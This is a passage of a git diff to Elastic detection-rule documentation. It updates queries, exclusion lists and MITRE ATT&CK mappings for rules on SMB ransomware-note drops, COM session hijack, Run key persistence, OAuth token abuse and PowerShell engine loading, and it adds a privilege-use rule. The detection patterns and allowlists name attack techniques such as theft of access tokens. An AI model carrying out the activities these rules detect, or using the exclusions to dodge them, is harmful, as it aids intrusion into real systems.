dropping file notes to different folders. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://news.sophos.com/en-us/2023/12/21/akira-again-the-ransomware-that-keeps-on-taking/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Impact +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 211 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Possible investigation steps* + + +- Investigate the content of the dropped files. +- Investigate any file names with unusual extensions. +- Investigate any incoming network connection to port 445 on this host. +- Investigate any network logon events to this host. +- Identify the total number and type of modified files by pid 4. +- If the number of files is too high and source.ip connecting over SMB is unusual isolate the host and block the used credentials. +- Investigate other alerts associated with the user/host during the past 48 hours. + + +*False positive analysis* + + +- Local file modification from a Kernel mode driver. + + +*Related rules* + + +- Third-party Backup Files Deleted via Unexpected Process - 11ea6bec-ebde-4d71-a8e9-784948f8e3e9 +- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921 +- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4 +- Volume Shadow Copy Deletion via WMIC - dc9c1f74-dac3-48e3-b47f-eb79db358f57 +- Potential Ransomware Note File Dropped via SMB - 02bab13d-fb14-4d7c-b6fe-4a28874d37c5 +- Suspicious File Renamed via SMB - 78e9b5d5-7c07-40a7-a591-3dbbf464c386 + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- If any other destructive action was identified on the host, it is recommended to prioritize the investigation and look for ransomware preparation and execution activities. +- If any backups were affected: + - Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.). +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-endpoint.events.file-* metadata _id, _version, _index + +// filter for file creation event done remotely over SMB with common user readable file types used to place ransomware notes +| where event.category == "file" and host.os.type == "windows" and event.action == "creation" and process.pid == 4 and user.id != "S-1-5-18" and + file.extension in ("txt", "htm", "html", "hta", "pdf", "jpg", "bmp", "png", "pdf") + +// truncate the timestamp to a 60-second window +| eval Esql.time_window_date_trunc = date_trunc(60 seconds, @timestamp) + +| keep file.path, file.name, process.entity_id, Esql.time_window_date_trunc + +// filter for same file name dropped in at least 3 unique paths by the System virtual process +| stats Esql.file_path_count_distinct = COUNT_DISTINCT(file.path), Esql.file_path_values = VALUES(file.path) by process.entity_id , file.name, Esql.time_window_date_trunc +| where Esql.file_path_count_distinct >= 3 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Data Destruction +** ID: T1485 +** Reference URL: https://attack.mitre.org/techniques/T1485/ +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: SMB/Windows Admin Shares +** ID: T1021.002 +** Reference URL: https://attack.mitre.org/techniques/T1021/002/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-remotemonologue-attack.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-remotemonologue-attack.asciidoc index 76ce05f2c8..554a814395 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-remotemonologue-attack.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-remotemonologue-attack.asciidoc @@ -41,7 +41,7 @@ Identifies attempt to perform session hijack via COM object registry modificatio * Data Source: Sysmon * Resources: Investigation Guide -*Version*: 3 +*Version*: 4 *Rule authors*: @@ -136,7 +136,7 @@ registry where host.os.type == "windows" and event.action != "deletion" and "HKLM\\SOFTWARE\\Microsoft\\Office\\ClickToRun\\VREGISTRY_*", "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Office\\ClickToRun\\VREGISTRY_*" ) or - (process.executable : "C:\\windows\\System32\\msiexec.exe" and user.id : "S-1-5-18") + (process.executable : "C:\\windows\\System32\\msiexec.exe" and ?user.id : "S-1-5-18") ) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/sharepoint-malware-file-upload.asciidoc b/docs/detections/prebuilt-rules/rule-details/sharepoint-malware-file-upload.asciidoc index 18bbc93fc1..24a21b325c 100644 --- a/docs/detections/prebuilt-rules/rule-details/sharepoint-malware-file-upload.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/sharepoint-malware-file-upload.asciidoc @@ -7,8 +7,8 @@ Identifies the occurence of files uploaded to SharePoint being detected as Malwa *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: high @@ -16,7 +16,7 @@ Identifies the occurence of files uploaded to SharePoint being detected as Malwa *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -31,7 +31,7 @@ Identifies the occurence of files uploaded to SharePoint being detected as Malwa * Tactic: Lateral Movement * Resources: Investigation Guide -*Version*: 209 +*Version*: 210 *Rule authors*: @@ -113,3 +113,15 @@ event.dataset:o365.audit and event.provider:SharePoint and event.code:SharePoint ** Name: Taint Shared Content ** ID: T1080 ** Reference URL: https://attack.mitre.org/techniques/T1080/ +* Tactic: +** Name: Resource Development +** ID: TA0042 +** Reference URL: https://attack.mitre.org/tactics/TA0042/ +* Technique: +** Name: Stage Capabilities +** ID: T1608 +** Reference URL: https://attack.mitre.org/techniques/T1608/ +* Sub-technique: +** Name: Upload Malware +** ID: T1608.001 +** Reference URL: https://attack.mitre.org/techniques/T1608/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/startup-or-run-key-registry-modification.asciidoc b/docs/detections/prebuilt-rules/rule-details/startup-or-run-key-registry-modification.asciidoc index 9aaedae904..324fabac40 100644 --- a/docs/detections/prebuilt-rules/rule-details/startup-or-run-key-registry-modification.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/startup-or-run-key-registry-modification.asciidoc @@ -33,7 +33,7 @@ Identifies run key or startup key registry modifications. In order to survive re * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 117 +*Version*: 118 *Rule authors*: @@ -140,217 +140,34 @@ registry where host.os.type == "windows" and event.type == "change" and not registry.data.strings : "ctfmon.exe /n" and not (registry.value : "Application Restart #*" and process.name : "csrss.exe") and not user.id : ("S-1-5-18", "S-1-5-19", "S-1-5-20") and - not registry.data.strings : ("?:\\Program Files\\*.exe", "?:\\Program Files (x86)\\*.exe") and - not process.executable : ("?:\\Windows\\System32\\msiexec.exe", "?:\\Windows\\SysWOW64\\msiexec.exe") and - not ( - /* Logitech G Hub */ - ( - process.code_signature.trusted == true and process.code_signature.subject_name == "Logitech Inc" and - ( - process.name : "lghub_agent.exe" and registry.data.strings : ( - "\"?:\\Program Files\\LGHUB\\lghub.exe\" --background", - "\"?:\\Program Files\\LGHUB\\system_tray\\lghub_system_tray.exe\" --minimized" - ) - ) or - ( - process.name : "LogiBolt.exe" and registry.data.strings : ( - "?:\\Program Files\\Logi\\LogiBolt\\LogiBolt.exe --startup", - "?:\\Users\\*\\AppData\\Local\\Logi\\LogiBolt\\LogiBolt.exe --startup" - ) - ) - ) or - - /* Google Drive File Stream, Chrome, and Google Update */ - ( - process.code_signature.trusted == true and process.code_signature.subject_name == "Google LLC" and - ( - process.name : "GoogleDriveFS.exe" and registry.data.strings : ( - "\"?:\\Program Files\\Google\\Drive File Stream\\*\\GoogleDriveFS.exe\" --startup_mode" - ) or - - process.name : "chrome.exe" and registry.data.strings : ( - "\"?:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --no-startup-window /prefetch:5", - "\"?:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\" --no-startup-window /prefetch:5" - ) or - - process.name : ("GoogleUpdate.exe", "updater.exe") and registry.data.strings : ( - "\"?:\\Users\\*\\AppData\\Local\\Google\\Update\\*\\GoogleUpdateCore.exe\"", - "\"?:\\Users\\*\\AppData\\Local\\Google\\GoogleUpdater\\*\\updater.exe\" --wake" - ) - ) - ) or - - /* MS Programs */ - ( - process.code_signature.trusted == true and process.code_signature.subject_name in ("Microsoft Windows", "Microsoft Corporation") and - ( - process.name : "msedge.exe" and registry.data.strings : ( - "\"?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window --win-session-start /prefetch:5", - "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --win-session-start", - "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window --win-session-start" - ) or - - process.name : ("Update.exe", "Teams.exe", "ms-teamsupdate.exe") and registry.data.strings : ( - "?:\\Users\\*\\AppData\\Local\\Microsoft\\Teams\\Update.exe --processStart \"Teams.exe\" --process-start-args \"--system-initiated\"", - "?:\\ProgramData\\*\\Microsoft\\Teams\\Update.exe --processStart \"Teams.exe\" --process-start-args \"--system-initiated\"", - "ms-teamsupdate.exe -UninstallT20" - ) or - - process.name : ("OneDrive*.exe", "Microsoft.SharePoint.exe") and registry.data.strings : ( - "?:\\Program Files\\Microsoft OneDrive\\OneDrive.exe /background *", - "?:\\Program Files (x86)\\Microsoft OneDrive\\OneDrive.exe /background*", - "\"?:\\Program Files (x86)\\Microsoft OneDrive\\OneDrive.exe\" /background*", - "\"?:\\Users\\*\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background", - "?:\\Users\\*\\AppData\\Local\\Microsoft\\OneDrive\\??.???.????.????\\Microsoft.SharePoint.exe", - "?:\\Windows\\system32\\cmd.exe /q /c * \"?:\\Users\\*\\AppData\\Local\\Microsoft\\OneDrive\\*\"" - ) or - - process.name : "MicrosoftEdgeUpdate.exe" and registry.data.strings : ( - "\"?:\\Users\\*\\AppData\\Local\\Microsoft\\EdgeUpdate\\*\\MicrosoftEdgeUpdateCore.exe\"" - ) or - - process.executable : "?:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\*\\Installer\\setup.exe" and - registry.data.strings : ( - "\"?:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\*\\Installer\\setup.exe\" --msedgewebview --delete-old-versions --system-level --verbose-logging --on-logon" - ) or - - process.name : "BingWallpaper.exe" and registry.data.strings : ( - "C:\\Users\\*\\AppData\\Local\\Temp\\*\\UnInstDaemon.exe" - ) or - - /* Discord Update.exe via reg.exe */ - process.name : "reg.exe" and registry.data.strings : ( - "\"C:\\Users\\*\\AppData\\Local\\Discord\\Update.exe\" --processStart Discord.exe" - ) - ) - ) or - - /* Slack */ - ( - process.code_signature.trusted == true and process.code_signature.subject_name in ( - "Slack Technologies, Inc.", "Slack Technologies, LLC" - ) and process.name : "slack.exe" and registry.data.strings : ( - "\"?:\\Users\\*\\AppData\\Local\\slack\\slack.exe\" --process-start-args --startup", - "\"?:\\ProgramData\\*\\slack\\slack.exe\" --process-start-args --startup", - "\"?:\\Program Files\\Slack\\slack.exe\" --process-start-args --startup" - ) - ) or - - /* Cisco */ - ( - process.code_signature.trusted == true and process.code_signature.subject_name in ("Cisco WebEx LLC", "Cisco Systems, Inc.") and - ( - process.name : "WebexHost.exe" and registry.data.strings : ( - "\"?:\\Users\\*\\AppData\\Local\\WebEx\\WebexHost.exe\" /daemon /runFrom=autorun" - ) - ) or - ( - process.name : "CiscoJabber.exe" and registry.data.strings : ( - "\"?:\\Program Files (x86)\\Cisco Systems\\Cisco Jabber\\CiscoJabber.exe\" /min" - ) - ) - ) or - - /* Loom */ - ( - process.code_signature.trusted == true and process.code_signature.subject_name == "Loom, Inc." and - process.name : "Loom.exe" and registry.data.strings : ( - "?:\\Users\\*\\AppData\\Local\\Programs\\Loom\\Loom.exe --process-start-args \"--loomHidden\"" - ) - ) or - - /* Adobe */ - ( - process.code_signature.trusted == true and process.code_signature.subject_name == "Adobe Inc." and - process.name : ("Acrobat.exe", "FlashUtil32_*_Plugin.exe") and registry.data.strings : ( - "\"?:\\Program Files\\Adobe\\Acrobat DC\\Acrobat\\AdobeCollabSync.exe\"", - "\"?:\\Program Files (x86)\\Adobe\\Acrobat DC\\Acrobat\\AdobeCollabSync.exe\"", - "?:\\WINDOWS\\SysWOW64\\Macromed\\Flash\\FlashUtil32_*_Plugin.exe -update plugin" - ) - ) or - - /* CCleaner */ - ( - process.code_signature.trusted == true and - process.code_signature.subject_name in ("PIRIFORM SOFTWARE LIMITED", "Gen Digital Inc.") and - process.name : ("CCleanerBrowser.exe", "CCleaner64.exe") and registry.data.strings : ( - "\"C:\\Program Files (x86)\\CCleaner Browser\\Application\\CCleanerBrowser.exe\" --check-run=src=logon --auto-launch-at-startup --profile-directory=\"Default\"", - "\"C:\\Program Files\\CCleaner\\CCleaner64.exe\" /MONITOR" - ) - ) or - - /* Opera */ - ( - process.code_signature.trusted == true and process.code_signature.subject_name == "Opera Norway AS" and - process.name : ("opera.exe", "assistant_installer.exe") and registry.data.strings : ( - "?:\\Users\\*\\AppData\\Local\\Programs\\Opera\\launcher.exe", - "?:\\Users\\*\\AppData\\Local\\Programs\\Opera\\opera.exe", - "?:\\Users\\*\\AppData\\Local\\Programs\\Opera GX\\launcher.exe", - "?:\\Users\\*\\AppData\\Local\\Programs\\Opera GX\\opera.exe", - "?:\\Users\\*\\AppData\\Local\\Programs\\Opera\\assistant\\browser_assistant.exe" - ) - ) or - - /* Avast */ - ( - process.code_signature.trusted == true and process.code_signature.subject_name == "Avast Software s.r.o." and - process.name : "AvastBrowser.exe" and registry.data.strings : ( - "\"?:\\Users\\*\\AppData\\Local\\AVAST Software\\Browser\\Application\\AvastBrowser.exe\" --check-run=src=logon --auto-launch-at-startup*", - "\"?:\\Program Files (x86)\\AVAST Software\\Browser\\Application\\AvastBrowser.exe\" --check-run=src=logon --auto-launch-at-startup*", - "" - ) - ) or - - /* Grammarly */ - ( - process.code_signature.trusted == true and process.code_signature.subject_name == "Grammarly, Inc." and - process.name : "GrammarlyInstaller.exe" and registry.data.strings : ( - "?:\\Users\\*\\AppData\\Local\\Grammarly\\DesktopIntegrations\\Grammarly.Desktop.exe", - "\"?:\\Users\\*\\AppData\\Local\\Grammarly\\DesktopIntegrations\\Grammarly.Desktop.exe\"" - ) - ) or - - /* AVG */ - ( - process.code_signature.trusted == true and process.code_signature.subject_name == "AVG Technologies USA, LLC" and - process.name : "AVGBrowser.exe" and registry.data.strings : ( - "\"C:\\Program Files\\AVG\\Browser\\Application\\AVGBrowser.exe\"*", - "\"C:\\Users\\*\\AppData\\Local\\AVG\\Browser\\Application\\AVGBrowser.exe\"*" - ) - ) or - - /* HP */ - ( - process.code_signature.trusted == true and process.code_signature.subject_name == "HP Inc." and - process.name : "ScanToPCActivationApp.exe" and registry.data.strings : ( - "\"C:\\Program Files\\HP\\HP*" - ) - ) or - - /* 1Password */ - ( - process.code_signature.trusted == true and process.code_signature.subject_name == "Agilebits" and - process.name : "1PasswordSetup*.exe" and registry.data.strings : ( - "\"C:\\Users\\*\\AppData\\Local\\1Password\\app\\?\\1Password.exe\" --silent" - ) - ) or - - /* OpenVPN */ - ( - process.code_signature.trusted == true and process.code_signature.subject_name == "OpenVPN Inc." and - process.name : "OpenVPNConnect.exe" and registry.data.strings : ( - "C:\\Program Files\\OpenVPN Connect\\OpenVPNConnect.exe --opened-at-login --minimize" - ) - ) or - - /* Docker */ - ( - process.code_signature.trusted == true and process.code_signature.subject_name == "Docker Inc" and - process.name: "com.docker.backend.exe" and registry.data.strings : ( - "C:\\Program Files\\Docker\\Docker\\Docker Desktop.exe -Autostart" - ) - ) - ) + not registry.data.strings : ("*:\\Program Files\\*", + "*:\\Program Files (x86)\\*", + "*:\\Users\\*\\AppData\\Local\\*", + "* --processStart *", + "* --process-start-args *", + "ms-teamsupdate.exe -UninstallT20", + " ", + "grpconv -o", "* /burn.runonce*", "* /startup", + "?:\\WINDOWS\\SysWOW64\\Macromed\\Flash\\FlashUtil32_*_Plugin.exe -update plugin") and + not process.executable : ("?:\\Windows\\System32\\msiexec.exe", + "?:\\Windows\\SysWOW64\\msiexec.exe", + "D:\\*", + "\\Device\\Mup*", + "C:\\Windows\\SysWOW64\\reg.exe", + "C:\\Windows\\System32\\changepk.exe", + "C:\\Windows\\System32\\netsh.exe", + "C:\\$WINDOWS.~BT\\Sources\\SetupPlatform.exe", + "C:\\$WINDOWS.~BT\\Sources\\SetupHost.exe", + "C:\\Program Files\\Cisco Spark\\CiscoCollabHost.exe", + "C:\\Sistemas\\Programas MP\\CCleaner\\CCleaner64.exe", + "C:\\Program Files (x86)\\FastTrack Software\\Admin By Request\\AdminByRequest.exe", + "C:\\Program Files (x86)\\Exclaimer Ltd\\Cloud Signature Update Agent\\Exclaimer.CloudSignatureAgent.exe", + "C:\\ProgramData\\Lenovo\\Vantage\\AddinData\\LenovoBatteryGaugeAddin\\x64\\QSHelper.exe", + "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\*\\Installer\\setup.exe", + "C:\\ProgramData\\bomgar-scc-*\\bomgar-scc.exe", + "C:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil*_pepper.exe", + "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\*.EXE", + "C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\*\\AdobeARM.exe") ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-entra-id-oauth-user-impersonation-scope-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-entra-id-oauth-user-impersonation-scope-detected.asciidoc index 81e6269624..7d865f13e7 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-entra-id-oauth-user-impersonation-scope-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-entra-id-oauth-user-impersonation-scope-detected.asciidoc @@ -33,11 +33,10 @@ Identifies rare occurrences of OAuth workflow for a user principal that is singl * Data Source: Azure * Data Source: Microsoft Entra ID * Data Source: Microsoft Entra ID Sign-In Logs -* Tactic: Defense Evasion * Tactic: Initial Access * Resources: Investigation Guide -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -113,6 +112,18 @@ event.dataset: azure.signinlogs and *Framework*: MITRE ATT&CK^TM^ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ * Tactic: ** Name: Defense Evasion ** ID: TA0005 @@ -125,3 +136,7 @@ event.dataset: azure.signinlogs and ** Name: Application Access Token ** ID: T1550.001 ** Reference URL: https://attack.mitre.org/techniques/T1550/001/ +* Technique: +** Name: Impersonation +** ID: T1656 +** Reference URL: https://attack.mitre.org/techniques/T1656/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-microsoft-365-userloggedin-via-oauth-code.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-microsoft-365-userloggedin-via-oauth-code.asciidoc index f601dbd53a..98ebe35412 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-microsoft-365-userloggedin-via-oauth-code.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-microsoft-365-userloggedin-via-oauth-code.asciidoc @@ -35,7 +35,7 @@ Identifies sign-ins on behalf of a principal user to the Microsoft Graph API fro * Resources: Investigation Guide * Tactic: Defense Evasion -*Version*: 3 +*Version*: 4 *Rule authors*: @@ -161,3 +161,23 @@ from logs-o365.audit-* ** Name: Application Access Token ** ID: T1550.001 ** Reference URL: https://attack.mitre.org/techniques/T1550/001/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal Application Access Token +** ID: T1528 +** Reference URL: https://attack.mitre.org/techniques/T1528/ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Link +** ID: T1566.002 +** Reference URL: https://attack.mitre.org/techniques/T1566/002/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-microsoft-oauth-flow-via-auth-broker-to-drs.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-microsoft-oauth-flow-via-auth-broker-to-drs.asciidoc index 88ecfaff5f..6e2eca0a40 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-microsoft-oauth-flow-via-auth-broker-to-drs.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-microsoft-oauth-flow-via-auth-broker-to-drs.asciidoc @@ -35,7 +35,7 @@ Identifies separate OAuth authorization flows in Microsoft Entra ID where the sa * Resources: Investigation Guide * Tactic: Initial Access -*Version*: 3 +*Version*: 4 *Rule authors*: @@ -109,7 +109,7 @@ This rule requires the Microsoft Entra ID Sign-In Logs integration be enabled an [source, js] ---------------------------------- -from logs-azure.signinlogs* metadata _id, _version, _index +from logs-azure.signinlogs-* metadata _id, _version, _index | where event.dataset == "azure.signinlogs" and event.outcome == "success" and @@ -218,6 +218,14 @@ from logs-azure.signinlogs* metadata _id, _version, _index ** ID: TA0001 ** Reference URL: https://attack.mitre.org/tactics/TA0001/ * Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Technique: ** Name: Phishing ** ID: T1566 ** Reference URL: https://attack.mitre.org/techniques/T1566/ @@ -225,3 +233,11 @@ from logs-azure.signinlogs* metadata _id, _version, _index ** Name: Spearphishing Link ** ID: T1566.002 ** Reference URL: https://attack.mitre.org/techniques/T1566/002/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal Application Access Token +** ID: T1528 +** Reference URL: https://attack.mitre.org/techniques/T1528/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-path-invocation-from-command-line.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-path-invocation-from-command-line.asciidoc index 794f7897df..29235101f7 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-path-invocation-from-command-line.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-path-invocation-from-command-line.asciidoc @@ -33,7 +33,7 @@ This rule detects the execution of a PATH variable in a command line invocation * Data Source: Elastic Defend * Resources: Investigation Guide -*Version*: 4 +*Version*: 5 *Rule authors*: @@ -135,7 +135,15 @@ For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/ ---------------------------------- event.category:process and host.os.type:linux and event.type:start and event.action:exec and process.name:(bash or csh or dash or fish or ksh or sh or tcsh or zsh) and process.args:-c and -process.command_line:(*PATH=* and not sh*/run/motd.dynamic.new) +process.command_line:*PATH=* and +not ( + process.command_line:(*_PATH=* or *PYTHONPATH=* or sh*/run/motd.dynamic.new) or + process.parent.executable:( + "/opt/puppetlabs/puppet/bin/puppet" or /var/lib/docker/overlay2/* or /vz/root/*/dovecot or + "/usr/libexec/dovecot/auth" or /home/*/.local/share/containers/* or /vz/root/*/dovecot/auth + ) or + process.parent.command_line:"runc init" +) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-powershell-engine-imageload.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-powershell-engine-imageload.asciidoc index c67d553fe3..d266f70928 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-powershell-engine-imageload.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-powershell-engine-imageload.asciidoc @@ -32,7 +32,7 @@ Identifies the PowerShell engine being invoked by unexpected processes. Rather t * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 213 +*Version*: 214 *Rule authors*: @@ -103,23 +103,42 @@ Attackers can use PowerShell without having to execute `PowerShell.exe` directly [source, js] ---------------------------------- -host.os.type:windows and event.category:library and - dll.name:("System.Management.Automation.dll" or "System.Management.Automation.ni.dll") and +host.os.type:windows and event.category:library and + dll.name:("System.Management.Automation.dll" or "System.Management.Automation.ni.dll") and not ( - process.code_signature.subject_name:("Microsoft Corporation" or "Microsoft Dynamic Code Publisher" or "Microsoft Windows") and process.code_signature.trusted:true and not process.name.caseless:("regsvr32.exe" or "rundll32.exe") - ) and + process.code_signature.subject_name:( + "Microsoft Corporation" or + "Microsoft Dynamic Code Publisher" or + "Microsoft Windows" + ) and process.code_signature.trusted:true and not process.name.caseless:"regsvr32.exe" + ) and not ( - process.executable.caseless:(C\:\\Program*Files*\(x86\)\\*.exe or C\:\\Program*Files\\*.exe) and + process.executable:(C\:\\Program*Files*\(x86\)\\*.exe or C\:\\Program*Files\\*.exe) and process.code_signature.trusted:true - ) and + ) and not ( - process.executable.caseless: C\:\\Windows\\Lenovo\\*.exe and process.code_signature.subject_name:"Lenovo" and + process.executable: C\:\\Windows\\Lenovo\\*.exe and process.code_signature.subject_name:"Lenovo" and process.code_signature.trusted:true - ) and + ) and not ( - process.executable.caseless: "C:\\ProgramData\\chocolatey\\choco.exe" and - process.code_signature.subject_name:"Chocolatey Software, Inc." and process.code_signature.trusted:true - ) and not process.executable.caseless : "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" + process.executable: C\:\\Windows\\AdminArsenal\\PDQInventory-Scanner\\service-*\\exec\\PDQInventoryScanner.exe and + process.code_signature.subject_name:"PDQ.com Corporation" and + process.code_signature.trusted:true + ) and + not ( + process.executable: C\:\\Windows\\Temp\\\{*\}\\_is*.exe and + process.code_signature.subject_name:("Dell Technologies Inc." or "Dell Inc" or "Dell Inc.") and + process.code_signature.trusted:true + ) and + not ( + process.executable: C\:\\ProgramData\\chocolatey\\* and + process.code_signature.subject_name:("Chocolatey Software, Inc." or "Chocolatey Software, Inc") and + process.code_signature.trusted:true + ) and + not process.executable : ( + "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" or + "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" + ) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-seincreasebasepriorityprivilege-use.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-seincreasebasepriorityprivilege-use.asciidoc new file mode 100644 index 0000000000..9db1c3067f --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-seincreasebasepriorityprivilege-use.asciidoc @@ -0,0 +1,126 @@ +[[suspicious-seincreasebasepriorityprivilege-use]] +=== Suspicious SeIncreaseBasePriorityPrivilege Use + +Identifies attempts to use the SeIncreaseBasePriorityPrivilege privilege by an unusual process. This could be related to hijack execution flow of a process via threats priority manipulation. + +*Rule type*: query + +*Rule indices*: + +* logs-system.security* +* logs-windows.forwarded* +* winlogbeat-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/Octoberfest7/ThreadCPUAssignment_POC/tree/main +* https://x.com/sixtyvividtails/status/1970721197617717483 +* https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4674 + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Data Source: Windows Security Event Logs +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Suspicious SeIncreaseBasePriorityPrivilege Use* + + +SeIncreaseBasePriorityPrivilege allows to increase the priority of processes running on the system so that the CPU scheduler allows them to pre-empt other lower priority processes when the higher priority process has something to do. + + +*Possible investigation steps* + + +- Review the process.executable reputation and it's execution chain. +- Investiguate if the SubjectUserName is expected to perform this action. +- Correlate the event with other security alerts or logs to identify any patterns or additional suspicious activities that might suggest a broader attack campaign. +- Check the agent health status and verify if there is any tampering with endpoint security processes. + + +*False positive analysis* + + +- Administrative tasks involving legitimate CPU scheduling priority changes. + + +*Response and remediation* + + +- Immediately isolate the affected machine from the network to prevent further unauthorized access or lateral movement within the domain. +- Terminate the processes involved in the execution chain. +- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to ensure comprehensive remediation efforts are undertaken. + +==== Setup + + + +*Setup* + + +Ensure advanced audit policies for Windows are enabled, specifically: +Audit Sensitive Privilege Use https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4674[Event ID 4674] (An operation was attempted on a privileged object.) + +``` +Computer Configuration > +Policies > +Windows Settings > +Security Settings > +Advanced Audit Policies Configuration > +Audit Policies > +Privilege Use > +Audit Sensitive Privilege Use (Success) +``` + + +==== Rule query + 